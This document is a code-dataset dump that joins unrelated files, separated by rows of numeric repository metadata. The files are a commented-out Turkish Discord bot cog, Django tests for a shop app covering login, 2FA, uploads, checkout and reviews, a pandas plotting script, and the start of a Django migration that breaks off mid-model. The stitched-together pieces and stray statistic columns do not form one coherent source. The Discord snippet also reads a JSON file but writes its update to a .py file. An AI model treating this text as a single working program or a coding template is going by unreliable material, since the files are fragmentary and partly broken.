# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# embed = discord.Embed(title="Üye Bilgi Ekranı",description="Üye bilgi ekranına hoş geldin.\nAşağıdaki butonlara basarak\nbilgisini almak istediğin içeriği görebilirsin.",color = 0x8d42f5)
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# try:
# await component.respond()
# except:
# pass
# await component.message.edit(
# embed=embed,
# components = [
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# ),
# ]
# )
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('sil')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# await component.message.delete()
# else:
# try:
# await component.respond()
# except:
# pass
# await component.message.delete()
# del info[component.author.id]
# with open("files/infoMessage.py","w",encoding="utf-8") as dosya:
# dosya.write("info = ")
# dosya.write(str(info))
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# def setup(client):
# client.add_cog(Information(client))
| 41.642431
| 373
| 0.382563
| 2,462
| 34,938
| 5.393176
| 0.123883
| 0.043079
| 0.055355
| 0.068534
| 0.807802
| 0.801627
| 0.783401
| 0.778732
| 0.76879
| 0.753728
| 0
| 0.012207
| 0.509961
| 34,938
| 839
| 374
| 41.642431
| 0.76047
| 0.944187
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b4f6a6979f60206415ac42ae13093ab17a970251
| 27,291
|
py
|
Python
|
shop/tests.py
|
okcashpro/okshop
|
f18600537eca12a0fe7dd52ed5453ed65c2ecacc
|
[
"MIT"
] | 3
|
2017-01-18T14:21:41.000Z
|
2021-10-29T23:47:31.000Z
|
shop/tests.py
|
okcashpro/okshop
|
f18600537eca12a0fe7dd52ed5453ed65c2ecacc
|
[
"MIT"
] | 1
|
2017-05-16T20:24:01.000Z
|
2017-05-17T21:28:27.000Z
|
shop/tests.py
|
okcashpro/okshop
|
f18600537eca12a0fe7dd52ed5453ed65c2ecacc
|
[
"MIT"
] | 1
|
2021-10-29T23:47:24.000Z
|
2021-10-29T23:47:24.000Z
|
from django.test import TestCase, Client
from django.contrib.auth.models import User
from .models import *
from django.urls import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.files.uploadedfile import InMemoryUploadedFile
from io import BytesIO
import pyotp
import json
# Create your tests here.
class RegisterTestCase(TestCase):
    """Tests for the registration view (``shop:register``).

    A successful registration flashes only ``success``-tagged messages;
    any validation failure must not flash a ``success`` message.
    """

    def setUp(self):
        # Pre-existing user so username / e-mail collisions can be exercised.
        self.u1 = User.objects.create_user('u1', 'email@example.com', '')
        ue1 = UserExtra(user=self.u1)
        ue1.save()
        self.u1.save()

    def _register(self, username, email, password, confirm):
        """POST the registration form and return the followed response."""
        return self.client.post(reverse('shop:register'), {
            'username': username,
            'email': email,
            'password': password,
            'passwordconfirm': confirm
        }, follow=True)

    def test_user_register_all_valid(self):
        """A completely valid form registers successfully."""
        response = self._register('u3', 'test@example.com',
                                  'pass1234', 'pass1234')
        # assertEquals is a deprecated alias, removed in Python 3.12.
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertEqual(m.tags, 'success')

    def test_user_register_invalid_email(self):
        """A malformed e-mail address is rejected."""
        response = self._register('u4', 'test1@example',
                                  'pass1234', 'pass1234')
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')

    def test_user_register_password_too_short(self):
        """A too-short password ('pass123', 7 chars) is rejected."""
        response = self._register('u5', 'test2@example.com',
                                  'pass123', 'pass123')
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')

    def test_user_register_password_mismatch(self):
        """Mismatching password / confirmation is rejected."""
        response = self._register('u6', 'test3@example.com',
                                  'pass1234', 'pass4')
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')

    def test_user_register_username_in_use(self):
        """Registering with an already-taken username is rejected."""
        response = self._register('u1', 'test4@example.com',
                                  'pass1234', 'pass1234')
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')

    def test_user_email_in_use(self):
        """Registering with an already-taken e-mail is rejected."""
        response = self._register('u7', 'email@example.com',
                                  'pass1234', 'pass1234')
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')

    def test_user_invalid_username(self):
        """Invalid form data is rejected.

        NOTE(review): despite the name, the malformed field here is the
        *e-mail* ('test5@example'); confirm which field was meant.
        """
        response = self._register('u3', 'test5@example',
                                  'pass1234', 'pass1234')
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')
class LoginTestCase(TestCase):
    """Tests for the login view (``shop:login``), with and without 2FA."""

    def setUp(self):
        # u1: verified, no authenticator.
        self.u1 = User.objects.create_user('_u1', 'email@example.com',
                                           'p4ssw0rd')
        ue1 = UserExtra(user=self.u1, verified=True)
        ue1.save()
        self.u1.save()
        # u2: registered but not verified.
        self.u2 = User.objects.create_user('_u2', 'email2@example.com',
                                           'p4ssw0rd')
        ue2 = UserExtra(user=self.u2, verified=False)
        ue2.save()
        self.u2.save()
        # u3: verified with a TOTP authenticator (secret 'test') attached.
        self.u3 = User.objects.create_user('_u3', 'email3@example.com',
                                           'p4ssw0rd')
        ue3 = UserExtra(user=self.u3, verified=True, authenticator_id='test',
                        authenticator_verified=True)
        ue3.save()
        # BUG FIX: was `self.u1.save()` (copy-paste) — save the user
        # created just above instead.
        self.u3.save()

    def _login(self, data):
        """POST the login form and return the followed response."""
        return self.client.post(reverse('shop:login'), data, follow=True)

    def test_login_all_valid_no_2fa(self):
        """Correct credentials log in and flash a welcome message."""
        response = self._login({'username': '_u1', 'password': 'p4ssw0rd'})
        # assertEquals is a deprecated alias, removed in Python 3.12.
        self.assertEqual(response.status_code, 200)
        self.assertEqual(str(list(response.context['messages'])[0]),
                         'Welcome back, _u1!')

    def test_login_all_invalid_no_2fa(self):
        """Unknown username + wrong password flashes no success message."""
        response = self._login({'username': 'invalidname',
                                'password': 'paaaaaaaaaaaa'})
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')

    def test_login_invalid_pass_no_2fa(self):
        """A wrong password for an existing user is rejected."""
        response = self._login({'username': '_u1',
                                'password': 'paaaaaaaaaaaa'})
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')

    def test_login_not_verified(self):
        """An unverified account cannot log in."""
        response = self._login({'username': '_u2', 'password': 'p4ssw0rd'})
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')

    def test_login_all_valid_2fa(self):
        """A valid TOTP code for a 2FA account logs in."""
        totp = pyotp.TOTP('test')
        response = self._login({'username': '_u3', 'password': 'p4ssw0rd',
                                '2facode': totp.now()})
        self.assertEqual(str(list(response.context['messages'])[0]),
                         'Welcome back, _u3!')

    def test_login_invalid_2fa(self):
        """An empty TOTP code is rejected for a 2FA account."""
        response = self._login({'username': '_u3', 'password': 'p4ssw0rd',
                                '2facode': ''})
        self.assertEqual(response.status_code, 200)
        for m in list(response.context['messages']):
            self.assertNotEqual(m.tags, 'success')
class TestUploadFiles(TestCase):
    """Tests for uploading digital files to a product (``shop:uploadfile``)."""

    @staticmethod
    def _testfile():
        """Return a minimal one-byte upload payload."""
        return SimpleUploadedFile("file.txt", b"t", content_type="text/txt")

    def _upload(self, product_id, data):
        """POST *data* to the upload endpoint for *product_id*."""
        return self.client.post(
            reverse('shop:uploadfile', kwargs={'id': product_id}), data)

    def setUp(self):
        # Seller of p1.
        self.u1 = User.objects.create_user('__u1', '', 'passw0rd')
        ue1 = UserExtra(user=self.u1, verified=True)
        ue1.save()
        self.u1.save()
        self.p1 = Product(
            product_name='T',
            product_description='d',
            price=0,
            physical=False,
            seller=self.u1
        )
        self.p1.save()
        # Second user with no rights on p1.
        self.u2 = User.objects.create_user('__u2', '', 'passw0rd')
        ue2 = UserExtra(user=self.u2, verified=True)
        ue2.save()
        self.u2.save()

    def test_upload_product_not_found(self):
        """Uploading to a nonexistent product id returns 404."""
        self.client.login(username=self.u1.username, password='passw0rd')
        r = self._upload('291827346271725623',
                         {'file': self._testfile(), 'name': 'n'})
        self.assertEqual(r.status_code, 404)

    def test_upload_product_not_logged_in(self):
        """Anonymous uploads are not accepted."""
        r = self._upload(self.p1.id, {'file': self._testfile(), 'name': 'n'})
        self.assertNotEqual(r.status_code, 200)

    def test_upload_product_no_permission(self):
        """A user who is not the seller gets 403."""
        self.client.login(username=self.u2.username, password='passw0rd')
        r = self._upload(self.p1.id, {'file': self._testfile(), 'name': 'n'})
        self.assertEqual(r.status_code, 403)

    def test_upload_incomplete_request(self):
        """An empty POST body is a 400."""
        self.client.login(username=self.u1.username, password='passw0rd')
        r = self._upload(self.p1.id, {})
        self.assertEqual(r.status_code, 400)

    def test_upload_name_too_big(self):
        """A display name longer than 200 characters is a 400."""
        self.client.login(username=self.u1.username, password='passw0rd')
        r = self._upload(self.p1.id,
                         {'file': self._testfile(), 'name': 'a' * 201})
        self.assertEqual(r.status_code, 400)

    def test_upload_no_name(self):
        """An empty display name is a 400."""
        self.client.login(username=self.u1.username, password='passw0rd')
        r = self._upload(self.p1.id, {'file': self._testfile(), 'name': ''})
        self.assertEqual(r.status_code, 400)

    # Can't seem to fake file size... I'll have to rely on my intuition
    """def test_upload_file_too_large(self):
        self.client.login(username=self.u1.username, password='passw0rd')
        r = self.client.post(
            reverse('shop:uploadfile', kwargs={'id': self.p1.id}),
            {
                'file': InMemoryUploadedFile(
                    BytesIO(b"d"),
                    None,
                    'file.txt',
                    "text/txt",
                    10**10,
                    None,
                    None
                ),
                'name': 's'
            }
        )
        self.assertEqual(r.status_code, 400)"""

    def test_upload_all_fine(self):
        """A valid upload by the seller succeeds."""
        self.client.login(username=self.u1.username, password='passw0rd')
        r = self._upload(self.p1.id, {'file': self._testfile(), 'name': 's'})
        # TODO: Get this to work on py3.5
        """rjson = json.loads(str(r.content))
        file = DigitalFile.objects.get(id=rjson['file'])
        self.assertEqual(file.file.read(), b't')"""
        self.assertEqual(r.status_code, 200)
class TestDeleteFile(TestCase):
    """Tests for deleting a product's digital files (``shop:deletefile``)."""

    def setUp(self):
        # u1 is the seller; u2 has no rights on the product.
        self.u1 = User.objects.create_user('___u1', '', 'passw0rd')
        ue1 = UserExtra(user=self.u1, verified=True)
        ue1.save()
        self.u1.save()
        self.u2 = User.objects.create_user('___u2', '', 'passw0rd')
        ue2 = UserExtra(user=self.u2, verified=True)
        ue2.save()
        # BUG FIX: was `self.u1.save()` (copy-paste) — save u2 instead.
        self.u2.save()
        self.p1 = Product(product_name='T', product_description='d', price=0,
                          physical=False, seller=self.u1)
        self.p1.save()
        self.file1 = DigitalFile(
            file=SimpleUploadedFile("file.txt", b"t", content_type="text/txt"),
            name='test',
            product=self.p1
        )
        self.file1.save()
        self.file2 = DigitalFile(
            file=SimpleUploadedFile("file.txt", b"t", content_type="text/txt"),
            name='test',
            product=self.p1
        )
        self.file2.save()

    def _delete(self, file_id, **kwargs):
        """GET the delete endpoint for *file_id*."""
        return self.client.get(reverse('shop:deletefile',
                                       kwargs={'id': file_id}), **kwargs)

    def test_file_not_logged_in(self):
        """Anonymous users cannot delete files."""
        r = self._delete(self.file1.id)
        self.assertNotEqual(r.status_code, 200)

    def test_file_no_permission(self):
        """A user who is not the seller gets 403."""
        self.client.login(username=self.u2.username, password='passw0rd')
        r = self._delete(self.file1.id)
        self.assertEqual(r.status_code, 403)

    def test_file_not_exists(self):
        """Deleting a nonexistent file id returns 404."""
        self.client.login(username=self.u1.username, password='passw0rd')
        r = self._delete(2912787347128272)
        self.assertEqual(r.status_code, 404)

    def test_file_all_fine(self):
        """The seller can delete their own file."""
        self.client.login(username=self.u1.username, password='passw0rd')
        r = self._delete(self.file2.id, follow=True)
        self.assertEqual(r.status_code, 200)
class CheckoutTestCase(TestCase):
    """Tests for the multi-step checkout flow (``shop:checkout``)."""

    def setUp(self):
        # Three verified users: u1 (one wallet), u2 (two wallets),
        # u3 (two wallets carrying funds via negative `redeemed`).
        self.u1 = User.objects.create_user('____u1', '', 'passw0rd')
        self.u1.save()
        self.u2 = User.objects.create_user('____u2', '', 'passw0rd')
        self.u2.save()
        self.u3 = User.objects.create_user('____u3', '', 'passw0rd')
        self.u3.save()
        for owner in (self.u1, self.u2, self.u3):
            UserExtra(user=owner, verified=True).save()
        Wallet(user=self.u1).save()
        funded_wallets = [
            Wallet(user=self.u2),
            Wallet(user=self.u2, label='2'),
            Wallet(user=self.u3, label='3', redeemed=Decimal(-10000)),
            Wallet(user=self.u3, label='3', redeemed=Decimal(-500)),
        ]
        for wallet in funded_wallets:
            wallet.save()

        def make_product(**fields):
            # All test products share the same name and seller.
            product = Product(product_name='t', seller=self.u1, **fields)
            product.save()
            return product

        # Free digital product.
        self.p1 = make_product(price=0, physical=False, stock=10)
        # Free physical product, shipped worldwide for free.
        self.p2 = make_product(price=0, physical=True, stock=10,
                               worldwide_shipping=True, free_shipping=True)
        # Priced beyond any wallet balance in these fixtures.
        self.expensiveproduct = make_product(price=2**32, stock=10)
        # Affordable for u3's funded wallets.
        self.reasonableproduct = make_product(price=10, stock=10)
        self.outofstock = make_product(price=0, stock=0)

    def _checkout_with(self, user, product):
        """Log *user* in, put only *product* in the cart, GET checkout."""
        self.client.login(username=user.username, password='passw0rd')
        user.userextra.clear_cart()
        user.userextra.add_to_cart(product)
        return self.client.get(reverse('shop:checkout'))

    def test_checkout_not_logged_in(self):
        """Anonymous checkout is rejected."""
        response = self.client.get(reverse('shop:checkout'))
        self.assertNotEqual(response.status_code, 200)

    def test_checkout_cart_empty(self):
        """Checking out with an empty cart is rejected."""
        self.client.login(username=self.u1.username, password='passw0rd')
        self.u1.userextra.clear_cart()
        response = self.client.get(reverse('shop:checkout'))
        self.assertNotEqual(response.status_code, 200)

    def test_checkout_no_money(self):
        """An unaffordable cart cannot be checked out."""
        response = self._checkout_with(self.u1, self.expensiveproduct)
        self.assertNotEqual(response.status_code, 200)

    def test_checkout_outofstock(self):
        """An out-of-stock item cannot be checked out."""
        response = self._checkout_with(self.u1, self.outofstock)
        self.assertNotEqual(response.status_code, 200)

    def test_physical_one_wallet_free(self):
        """A free physical order starts at the address step."""
        response = self._checkout_with(self.u1, self.p2)
        self.assertTemplateUsed(response, 'shop/checkout1.html')

    def test_physical_one_wallet_free_incomplete_data(self):
        """Posting the checkout without address data flashes an error."""
        response = self._checkout_with(self.u1, self.p2)
        self.assertTemplateUsed(response, 'shop/checkout1.html')
        checkout = response.context['checkout']
        response = self.client.post(reverse('shop:checkout'),
                                    {'checkout': str(checkout.uuid)})
        self.assertGreater(len(response.context['messages']), 0)

    def test_physical_one_wallet_free_new_address(self):
        """A physical order with a fresh address reaches confirmation."""
        response = self._checkout_with(self.u1, self.p2)
        self.assertTemplateUsed(response, 'shop/checkout1.html')
        checkout = response.context['checkout']
        response = self.client.post(reverse('shop:checkout'), {
            'checkout': str(checkout.uuid),
            'name': "Mr. Testing",
            'address1': "Somewhere, Norcross",
            'state': "GA",
            'country': "US",
            'zip': "30092",
            'use_custom_address': ""
        })
        self.assertTemplateUsed(response, 'shop/checkout3.html')
        response = self.client.post(reverse('shop:checkout'),
                                    {'checkout': str(checkout.uuid),
                                     'confirm': ''})
        self.assertEqual(response.status_code, 302)

    def test_digital_one_wallet_free(self):
        """A free digital order skips straight to confirmation."""
        response = self._checkout_with(self.u1, self.p1)
        self.assertTemplateUsed(response, 'shop/checkout3.html')

    def test_digital_multiple_wallets_free(self):
        """A free order skips wallet selection even with several wallets."""
        response = self._checkout_with(self.u2, self.p1)
        self.assertTemplateUsed(response, 'shop/checkout3.html')

    def test_digital_multiple_wallets_enough_money(self):
        """A paid order with several funded wallets shows wallet selection."""
        response = self._checkout_with(self.u3, self.reasonableproduct)
        self.assertTemplateUsed(response, 'shop/checkout2.html')
class ReviewTestCase(TestCase):
    """Tests for posting product reviews via ``shop:viewproduct``."""

    def setUp(self):
        # These names are getting ridiculous
        # u1 sells p1/p2 and has purchased p1; u2 has also purchased p1.
        self.u1 = User.objects.create_user('______u1', '', 'passw0rd')
        self.u1.save()
        ue1 = UserExtra(user=self.u1, verified=True)
        ue1.save()
        c = Cart(user=self.u1)
        c.save()
        self.u2 = User.objects.create_user('______u2', '', 'passw0rd')
        self.u2.save()
        ue2 = UserExtra(user=self.u2, verified=True)
        ue2.save()
        c2 = Cart(user=self.u2)
        c2.save()
        self.p1 = Product(
            product_name='t',
            seller=self.u1,
            price=0,
            physical=False,
            stock=10
        )
        self.p1.save()
        # p2 is never purchased by anyone — used for the "not owned" case.
        self.p2 = Product(
            product_name='t',
            seller=self.u1,
            price=0,
            physical=False,
            stock=10
        )
        self.p2.save()
        self.pur = Purchase(by=self.u1)
        self.pur.save()
        pi = PurchaseItem(purchase=self.pur, price=Decimal(0), product=self.p1)
        pi.save()
        self.pur2 = Purchase(by=self.u2)
        self.pur2.save()
        pi2 = PurchaseItem(purchase=self.pur2, price=Decimal(0),
                           product=self.p1)
        pi2.save()

    def _post_review(self, product, title, rating, review):
        """POST a review form to *product*'s page and return the response."""
        return self.client.post(
            reverse('shop:viewproduct', kwargs={'id': product.id}),
            {'title': title, 'rating': rating, 'review': review})

    def test_post_not_logged_in(self):
        """Anonymous posts are redirected and nothing is stored."""
        self.client.logout()
        r = self._post_review(self.p1, 'post_not_logged_in', 3,
                              'This shouldn\'t have been posted')
        self.assertEqual(r.status_code, 302)
        self.assertEqual(
            0, self.p1.review_set.filter(title='post_not_logged_in').count())

    def test_post_not_owned(self):
        """Reviews on a product the user never bought are not stored."""
        self.client.login(username=self.u1.username, password='passw0rd')
        self._post_review(self.p2, 'post_not_owned', 3,
                          'This shouldn\'t have been posted')
        self.assertEqual(
            0, self.p2.review_set.filter(title='post_not_owned').count())

    def test_post_owned_title_too_long(self):
        """A 200-character title is rejected."""
        self.client.login(username=self.u1.username, password='passw0rd')
        self._post_review(self.p1, 'a' * 200, 3, 'test_post_too_long')
        self.assertEqual(
            0, self.p1.review_set.filter(review='test_post_too_long').count())

    def test_post_owned_rate_too_high(self):
        """A rating above 5 is rejected."""
        self.client.login(username=self.u1.username, password='passw0rd')
        self._post_review(self.p1, 'test_post_rate_high', 6,
                          'This shouldn\'t have been posted')
        self.assertEqual(
            0, self.p1.review_set.filter(title='test_post_rate_high').count())

    def test_post_owned_rate_too_low(self):
        """A rating below 1 is rejected."""
        self.client.login(username=self.u1.username, password='passw0rd')
        self._post_review(self.p1, 'test_post_rate_low', 0,
                          'This shouldn\'t have been posted')
        self.assertEqual(
            0, self.p1.review_set.filter(title='test_post_rate_low').count())

    def test_post_owned_rate_invalid(self):
        """A non-numeric rating is rejected."""
        self.client.login(username=self.u1.username, password='passw0rd')
        self._post_review(self.p1, 'test_post_rate_bad', 'neat',
                          'This shouldn\'t have been posted')
        self.assertEqual(
            0, self.p1.review_set.filter(title='test_post_rate_bad').count())

    def test_post_owned_all_fine(self):
        """A valid review from a purchaser is stored."""
        self.client.login(username=self.u1.username, password='passw0rd')
        self._post_review(self.p1, 'test_post_fine', 4,
                          'This should have been posted')
        self.assertEqual(
            1, self.p1.review_set.filter(title='test_post_fine').count())

    def test_post_owned_edit(self):
        """Posting a second review replaces the first one."""
        self.client.login(username=self.u2.username, password='passw0rd')
        self._post_review(self.p1, 't', 4,
                          'This shouldn\'t have been posted')
        self._post_review(self.p1, 'test_post_edit', 4,
                          'This should have been posted')
        self.assertEqual(0, self.p1.review_set.filter(title='t').count())
        self.assertEqual(
            1, self.p1.review_set.filter(title='test_post_edit').count())
class DeleteReviewTestCase(TestCase):
    """Tests for deleting reviews via ``shop:deletereview``."""

    def setUp(self):
        # u1 sells p1 and wrote r1; u2 wrote r2 and r3.
        self.u1 = User.objects.create_user('_______u1', '', 'passw0rd')
        self.u1.save()
        UserExtra(user=self.u1, verified=True).save()
        Cart(user=self.u1).save()
        self.u2 = User.objects.create_user('_______u2', '', 'passw0rd')
        self.u2.save()
        UserExtra(user=self.u2, verified=True).save()
        Cart(user=self.u2).save()
        self.p1 = Product(product_name='t', seller=self.u1, price=0,
                          physical=False, stock=10)
        self.p1.save()
        self.p2 = Product(product_name='t', seller=self.u1, price=0,
                          physical=False, stock=10)
        self.p2.save()
        saved = []
        for author, title, body in ((self.u1, 'r1', 'review 1'),
                                    (self.u2, 'r2', 'review 2'),
                                    (self.u2, 'r3', 'review 3')):
            review = Review(product=self.p1, user=author, rating=4,
                            title=title, review=body)
            review.save()
            saved.append(review)
        self.r1, self.r2, self.r3 = saved

    def _delete(self, review):
        """GET the delete endpoint for *review* on product p1."""
        return self.client.get(reverse('shop:deletereview', kwargs={
            'id': self.p1.id,
            'reviewid': review.id
        }))

    def test_delete_not_logged_in(self):
        """Anonymous users are redirected and the review survives."""
        self.client.logout()
        response = self._delete(self.r1)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(Review.objects.filter(title='r1').count(), 1)

    def test_delete_no_permission(self):
        """A user who is neither author nor seller cannot delete."""
        self.client.login(username=self.u2.username, password='passw0rd')
        response = self._delete(self.r1)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(Review.objects.filter(title='r1').count(), 1)

    def test_delete_poster(self):
        """The review's author can delete their own review."""
        self.client.login(username=self.u2.username, password='passw0rd')
        response = self._delete(self.r2)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(Review.objects.filter(title='r2').count(), 0)

    def test_delete_seller(self):
        """The product's seller can delete any review on it."""
        self.client.login(username=self.u1.username, password='passw0rd')
        response = self._delete(self.r3)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(Review.objects.filter(title='r3').count(), 0)
| 34.458333
| 79
| 0.548972
| 2,991
| 27,291
| 4.877967
| 0.092946
| 0.056203
| 0.027142
| 0.047498
| 0.837286
| 0.816313
| 0.785744
| 0.766347
| 0.739822
| 0.711446
| 0
| 0.033469
| 0.313547
| 27,291
| 791
| 80
| 34.501896
| 0.745329
| 0.005716
| 0
| 0.615506
| 0
| 0
| 0.124197
| 0
| 0
| 0
| 0
| 0.001264
| 0.106013
| 1
| 0.083861
| false
| 0.101266
| 0.014241
| 0
| 0.109177
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2eb7960ce3140ec7ac3164e707d922756ad1469b
| 1,279
|
py
|
Python
|
text_classifier/utils/analyze_data.py
|
felixdittrich92/Document_Scanner
|
64d482393aa76aa845a30cdf5c86c7705c780450
|
[
"MIT"
] | null | null | null |
text_classifier/utils/analyze_data.py
|
felixdittrich92/Document_Scanner
|
64d482393aa76aa845a30cdf5c86c7705c780450
|
[
"MIT"
] | null | null | null |
text_classifier/utils/analyze_data.py
|
felixdittrich92/Document_Scanner
|
64d482393aa76aa845a30cdf5c86c7705c780450
|
[
"MIT"
] | 1
|
2021-03-19T14:55:51.000Z
|
2021-03-19T14:55:51.000Z
|
"""Script to analyze the Dataframes."""
import pandas as pd
import matplotlib.pyplot as plt

# Base directory holding the parquet/csv data files (hard-coded for this
# one-off analysis script).
_DATA_DIR = '/home/felix/Desktop/Document_Scanner/text_classifier/data'

# Convert the parquet sources to CSV, then work from the CSV copies.
german_df = pd.read_parquet(f'{_DATA_DIR}/german.parquet')
english_df = pd.read_parquet(f'{_DATA_DIR}/english.parquet')
german_df.to_csv(f'{_DATA_DIR}/german.csv')
english_df.to_csv(f'{_DATA_DIR}/english.csv')
german_df = pd.read_csv(f'{_DATA_DIR}/german.csv')
english_df = pd.read_csv(f'{_DATA_DIR}/english.csv')

# BUG FIX: the original did `print(df.info)`, which prints the bound method
# object, not the summary. DataFrame.info() prints the summary itself.
print("german data")
german_df.info()
print("english data")
english_df.info()

# Bar chart of samples per label for each language; saved as PDF.
fig = german_df[["label", "text"]].groupby("label").count().plot(kind="bar", title="German Data").get_figure()
plt.xlabel("label")
plt.ylabel("text")
plt.tight_layout()
fig.savefig(f'{_DATA_DIR}/de_test.pdf')

fig = english_df[["label", "text"]].groupby("label").count().plot(kind="bar", title="English Data").get_figure()
plt.xlabel("label")
plt.ylabel("text")
plt.tight_layout()
fig.savefig(f'{_DATA_DIR}/en_test.pdf')
| 42.633333
| 112
| 0.784206
| 192
| 1,279
| 5.026042
| 0.244792
| 0.074611
| 0.132642
| 0.198964
| 0.765803
| 0.765803
| 0.765803
| 0.765803
| 0.765803
| 0.752332
| 0
| 0
| 0.04613
| 1,279
| 29
| 113
| 44.103448
| 0.790984
| 0.02502
| 0
| 0.272727
| 0
| 0
| 0.528226
| 0.449194
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
25823a8b6363471624240c48f9dff5e83c6d7d22
| 12,775
|
py
|
Python
|
items/migrations/0001_initial.py
|
LluisoCP/BooksAndFilms
|
a972091e920cb94313ab1f005a01bd72df538891
|
[
"MIT"
] | null | null | null |
items/migrations/0001_initial.py
|
LluisoCP/BooksAndFilms
|
a972091e920cb94313ab1f005a01bd72df538891
|
[
"MIT"
] | null | null | null |
items/migrations/0001_initial.py
|
LluisoCP/BooksAndFilms
|
a972091e920cb94313ab1f005a01bd72df538891
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.7 on 2019-09-17 12:09
from django.db import migrations, models
import django.db.models.deletion
import items.models
# Year choices 1800..2019 inclusive, shared by Book and Film (the original
# migration embedded the same 220-entry literal list twice).
_YEAR_CHOICES = [(year, year) for year in range(1800, 2020)]

# Comment grades 0..10 inclusive.
_GRADE_CHOICES = [(grade, grade) for grade in range(0, 11)]

# Original-language choices, shared by Book and Film.
# NOTE(review): 'Languange' and 'Rusian' are typos, but they are runtime
# choice labels from the original migration — changing them here would make
# this migration disagree with the models; fix in models.py + a new migration.
_LANGUAGE_CHOICES = [('', 'Choose Languange'), ('EN', 'English'), ('FR', 'French'), ('ES', 'Spanish'), ('CA', 'Catalan'), ('IT', 'Italian'), ('PT', 'Portuguese'), ('GK', 'Greek'), ('GM', 'German'), ('AR', 'Arabic'), ('RU', 'Rusian'), ('JP', 'Japanese'), ('CH', 'Chinese'), ('TK', 'Turkish'), ('DN', 'Danish'), ('SW', 'Swedish'), ('NW', 'Norwegian')]


class Migration(migrations.Migration):
    """Initial schema: Author, Book, Comment, Contact, Film and Genre."""

    initial = True

    dependencies = []

    operations = [
        migrations.CreateModel(
            name='Author',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=100)),
                ('last_name', models.CharField(max_length=100)),
                ('date_of_birth', models.DateField(blank=True, null=True, verbose_name='Born')),
                ('date_of_death', models.DateField(blank=True, null=True, verbose_name='Died')),
